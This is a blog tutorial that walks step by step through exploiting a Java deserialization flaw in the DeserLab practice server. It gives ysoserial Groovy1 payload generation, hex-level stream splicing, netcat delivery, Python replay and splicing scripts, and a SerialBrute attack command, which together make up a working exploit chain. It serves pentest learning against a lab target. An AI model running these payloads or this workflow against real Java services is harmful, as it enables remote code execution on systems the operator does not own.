How to Exploit Java Deserialization Flaws

Intro

After reading NickstaDB's excellent article on Attacking Java Deserialization, I was inspired to really learn this attack technique. Be sure to read the article first to understand Java deserialization. I had read about it briefly before, but this article made me want to dive in. The article does an awesome job of explaining everything, so I won't rehash any of that material. Instead, this post is a guide that steps through the actual exploit. I have many years of Java experience and the OSCE certification, but I have to admit there was a learning curve to these techniques, since there is some different terminology to understand. I'll save you a few hours of your life and step you through the process. Spoiler alert: I explain how to exploit his DeserLab vulnerable server.

Requirements

DeserLab vulnerable application (the README links to a pre-built JAR): https://github.com/NickstaDB/DeserLab

ysoserial for generating serialized payloads

https://github.com/frohoff/ysoserial/

or download the pre-built JAR

Wireshark to capture the network traffic

https://www.wireshark.org/#download

HxD hex editor (or use your favorite)

https://mh-nexus.de/downloads/HxDen.zip

NickstaDB's SerialBrute Python script

https://github.com/NickstaDB/SerialBrute/

Netcat (nc) for Windows or Linux

Long (difficult) Method

After going through the long way of exploiting this, I found his equally excellent Python script, SerialBrute.py, which automates some of the tasks. I'm going to explain the more detailed, manual method first, since it will give you a better understanding of how to exploit this flaw on your next pentest. Before exploiting the vulnerable server, I built a POC that replays a captured conversation between the client and the server, to verify that replaying works. The same replay is then used to deliver the exploit payload in place of the normal data.

The server binds to an IP address and port with the following command:

java -jar DeserLab.jar -server 192.168.1.5 1234

The client connects to the server, prompts for a few inputs, and then sends the data to the server:

java -jar DeserLab.jar -client 192.168.1.5 1234

1. The first step was to fire up the server

2. Then Wireshark was started and set to monitor port 1234 traffic

3. The client was then run to completion to get a full capture of the traffic

4. After the conversation finishes, right-click a packet and choose Follow > TCP Stream

5. In the drop-down list, pick only the client side of the traffic, choose "Raw" as the data format, and use Save as... to save the file as 'comms.bin'.



6. Using netcat (nc -nv 192.168.1.5 1234 < comms.bin), send the comms.bin capture to the server. It responds as normal, which verifies that the replay works.
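The netcat replay in step 6 can also be sketched in Python, which is handy once you start scripting the later steps. This is a minimal sketch of my own, not part of DeserLab or the original workflow; the function name `replay` and the 5-second timeout are assumptions. It sends the raw client-side bytes and collects whatever the server sends back.

```python
import socket


def replay(host: str, port: int, data: bytes, timeout: float = 5.0) -> bytes:
    """Send a captured client-side byte stream to host:port and return the server's reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(data)
        # Half-close our side: tells the server that no more input is coming.
        sock.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break  # server went quiet without closing; keep what we have
            if not chunk:
                break  # server closed the connection
            chunks.append(chunk)
    return b"".join(chunks)
```

For example, `replay("192.168.1.5", 1234, open("comms.bin", "rb").read())` should return the server's normal responses if the capture is good. A server that keeps the connection open after replying is handled by the timeout rather than blocking forever.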

Let's Exploit!

1. Follow the same steps as the POC, but this time have the client send only the first variable (not the hash).

2. Stop capturing with Wireshark at that point, because we only want the hello and first-string exchanges. We will append the exploit data after these so that it reaches the vulnerable part of the application.

3. In Wireshark, Follow > TCP Stream and save the client side of the communication in raw format to 'hello.bin'.

4. Generate attack payload: java -jar ysoserial.jar Groovy1 calc.exe >calc.exploit

DeserLab includes Groovy on its classpath, so Groovy1 was the chosen payload here, and we are spawning calculator. At this point we have the preamble/hello conversation and the attack payload, so we will merge them into a single file and send it the same way as in the POC exercise.

5. Open 'hello.bin' in HxD. It should look like this (notice the 0xAC, 0xED, 0x00, 0x05 bytes, the stream magic number and version described in the article):

6. Copy to the clipboard all the bytes after the magic number, from the first 0x77 through the final 0x74:

7. Open 'calc.exploit' in HxD (notice the same 0xAC 0xED 0x00 0x05 bytes?)

8. Put the cursor between the 4th (0x05) and 5th (0x73) bytes, right-click, choose 'Paste insert', and answer yes when asked about increasing the size of the file.

9. The bytes pasted from 'hello.bin' should now sit after the magic number sequence and in front of the exploit payload, and look like this (pasted bytes highlighted in red):

10. Save this file as 'payload.bin' and send it to the server with netcat, just as in the POC.

11. If everything was done correctly, calculator should pop!
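The HxD splice in steps 5 to 9 boils down to simple byte manipulation. The sketch below is my own illustration, assuming both files start with the 4-byte stream header AC ED 00 05. It keeps one header, appends everything after the header in hello.bin (the 0x77 ... 0x74 range), then everything after the header in calc.exploit (which starts at 0x73, TC_OBJECT). It also decodes hello.bin's short block-data records (type code 0x77 followed by a one-byte length, per the Java Object Serialization Stream Protocol), which is why the copied range begins at 0x77. What each record means to DeserLab is only inferred from the capture.

```python
STREAM_HEADER = bytes.fromhex("aced0005")  # STREAM_MAGIC 0xACED + STREAM_VERSION 5
TC_BLOCKDATA = 0x77  # short block-data record: a 1-byte length follows


def strip_header(stream: bytes) -> bytes:
    """Return everything after the 4-byte serialization stream header."""
    if not stream.startswith(STREAM_HEADER):
        raise ValueError("not a Java serialization stream (missing AC ED 00 05)")
    return stream[len(STREAM_HEADER):]


def block_data_records(body: bytes) -> list[bytes]:
    """Split a run of short TC_BLOCKDATA records (0x77, length, data...) into their data."""
    records = []
    i = 0
    while i < len(body):
        if body[i] != TC_BLOCKDATA:
            raise ValueError(f"unexpected type code 0x{body[i]:02x} at offset {i}")
        if i + 1 >= len(body):
            raise ValueError("truncated block-data record")
        length = body[i + 1]
        records.append(body[i + 2 : i + 2 + length])
        i += 2 + length
    return records


def splice(hello: bytes, exploit: bytes) -> bytes:
    """One header, then the captured hello/name records, then the ysoserial object."""
    return STREAM_HEADER + strip_header(hello) + strip_header(exploit)
```

For a hello.bin of `aced0005 7704 f000baaa 7702 0101 7706 0004 74657374`, `block_data_records(strip_header(...))` yields three records, the last being a 2-byte length (0x0004) followed by the string "test" typed at the client prompt. Writing `splice(open("hello.bin", "rb").read(), open("calc.exploit", "rb").read())` to disk should produce the same payload.bin as the manual steps.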

Slightly Shorter (easier) Method



1. Go back to Wireshark and open the capture from the exploit above, the one that captured the preamble, the hello, and the first variable (not the full conversation from the POC).

2. Follow > TCP Stream. Leave the whole conversation selected and pick 'Raw' from the drop-down, so your screen should look like this:

The client communication is in blue and the server is in red. You will use this hex communication to create a TCP replay file for the SerialBrute.py python script.

3. Following the instructions in the SerialBrute.py script, create a text file whose contents mimic the conversation in Wireshark:

aced0005

RECV

7704

f000baaa

RECV

7702

0101

7706

000474657374

RECV

PAYLOADNOHEADER

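The TCP replay file describes the conversation between the client and the server, and the script handles the heavy lifting. For example, our replay file says that the client sends 0xAC 0xED 0x00 0x05, receives data, sends 0x77 0x04, then sends 0xF0 0x00 0xBA 0xAA, receives data, and so on. Finally, PAYLOADNOHEADER marks where the generated payload is sent without its 0xAC 0xED 0x00 0x05 stream header, since the header was already sent at the start of the conversation.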

4. Save this text to a file 'communication.txt'

5. Launch the attack:

python SerialBrute.py -p communication.txt -c calc.exe -t 192.168.1.5:1234 -g Groovy1

6. The result should be the same: calculator pops.
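To make the replay file less of a black box, here is a rough re-implementation of how such a file could be interpreted. This is not SerialBrute's code: the function names and the `("send" | "recv" | "payload_noheader", data)` step tuples are hypothetical, and only the keywords used above (hex lines, RECV, PAYLOADNOHEADER) are handled. Notice that the bytes it sends, in order, are exactly payload.bin from the long method: the header and hello records from the capture, followed by the ysoserial payload minus its header.

```python
import socket


def parse_replay(text: str) -> list[tuple[str, bytes]]:
    """Turn replay-file lines into (action, data) steps; blank lines are ignored."""
    steps = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "RECV":
            steps.append(("recv", b""))
        elif line == "PAYLOADNOHEADER":
            steps.append(("payload_noheader", b""))
        else:
            # Any other line is hex-encoded client data to send as-is.
            steps.append(("send", bytes.fromhex(line)))
    return steps


def run_replay(sock: socket.socket, steps: list[tuple[str, bytes]], payload: bytes) -> None:
    """Walk the steps over a connected socket, inserting the payload where marked."""
    for action, data in steps:
        if action == "send":
            sock.sendall(data)
        elif action == "recv":
            # Simplification: a single recv(), assuming the server's reply fits in one read.
            sock.recv(4096)
        elif action == "payload_noheader":
            # Drop the 4-byte AC ED 00 05 header; it was already sent at the start.
            sock.sendall(payload[4:])
```

Against the lab, `run_replay(socket.create_connection(("192.168.1.5", 1234)), parse_replay(open("communication.txt").read()), open("calc.exploit", "rb").read())` roughly mirrors a single SerialBrute run, except that the payload comes from the calc.exploit file generated earlier rather than from ysoserial on the fly.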